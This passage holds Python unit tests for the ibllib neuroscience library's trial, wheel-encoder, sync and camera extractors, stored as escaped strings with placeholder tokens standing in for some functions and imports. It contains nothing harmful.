settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = 